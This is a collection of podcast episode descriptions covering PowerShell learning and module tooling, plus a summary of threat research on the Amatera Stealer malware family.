In this episode, Andrew catches up with Sean Wheeler and James Petty live from TechMentor. What starts as casual conversation about conference camaraderie turns into a rich discussion on learning PowerShell, building effective profiles, AI-assisted scripting, module recommendations, and what's next for the PowerShell Summit. Whether you're new to PowerShell or a seasoned scripter, this episode offers insights, laughs, and actionable advice. Plus, we finally settle (sort of) whether the VS Code sidebar belongs on the left or the right.    Key Takeaways You don't need to learn everything. Just understand the ecosystem and build your learning map. Create your PowerShell profile now—it's an easy win with huge productivity returns. AI is a tool, not a crutch. Use it wisely and validate the results. Get involved in the community. It will accelerate your learning and broaden your opportunities. Shoutouts & Links https://powershell.org https://www.youtube.com/c/PowerShellOrg https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/hr59kahksIM

In this high-energy episode, returning guests Gilbert Sanchez and Jake Hildreth join Andrew for a deep dive into: Module templating with PSStucco Building for accessibility in PowerShell Creating open source GitHub orgs like PSInclusive How PowerShell can lead to learning modern dev workflows like GitHub Actions and CI/CD What begins with a conversation about a live demo gone hilariously sideways turns into an insightful exploration of how PowerShell acts as a launchpad into bigger ecosystems like GitHub, YAML, JSON, and continuous integration pipelines.Bios &   Bios: Gilbert Sanchez is a Staff Software Development Engineer at Tesla, specifically working on PowerShell. Formerly known as "Señor Systems Engineer" at Meta. A loud advocate for DEI, DevEx, DevOps, and TDD.   Jake Hildreth is a Principal Security Consultant at Semperis, Microsoft MVP, and longtime builder of tools that make identity security suck a little less. With nearly 25 years in IT (and the battle scars to prove it), he specializes in helping orgs secure Active Directory and survive the baroque disaster that is Active Directory Certificate Services. He's the creator of Locksmith, BlueTuxedo, and PowerPUG!, open-source tools built to make life easier for overworked identity admins. When he's not untangling Kerberos or wrangling DNS, he's usually hanging out with his favorite people and most grounding reality check: his wife and daughter.   Links https://gilbertsanchez.com/posts/stucco-create-powershell-module/ https://jakehildreth.github.io/blog/2025/07/02/PowerShell-Module-Scaffolding-with-PSStucco.html https://github.com/PSInclusive https://jakehildreth.com/ https://andrewpla.tech/links https://discord.gg/pdq https://pdq.com/podcast https://youtu.be/w-z2-0ii96Y  

Today we are joined by ⁠Selena Larson⁠, Threat Researcher at ⁠Proofpoint⁠, and co-host of ⁠Only Malware in the Building⁠, as she discusses their work on "Amatera Stealer - Rebranded ACR Stealer With Improved Evasion, Sophistication." Proofpoint researchers have identified Amatera Stealer, a rebranded and actively developed malware-as-a-service (MaaS) variant of the former ACR Stealer, featuring advanced evasion techniques like NTSockets for stealthy C2 communication and WoW64 Syscalls to bypass user-mode defenses. Distributed via ClearFake web injects and the ClickFix technique, Amatera leverages multilayered PowerShell loaders, blockchain-based hosting, and creative social engineering to compromise victims. With enhanced capabilities to steal browser data, crypto wallets, and other sensitive files, Amatera poses a growing threat in the wake of disruptions to competing stealers like Lumma. Complete our annual ⁠audience survey⁠ before August 31. The research can be found here: ⁠Amatera Stealer: Rebranded ACR Stealer With Improved Evasion, Sophistication Learn more about your ad choices. Visit megaphone.fm/adchoices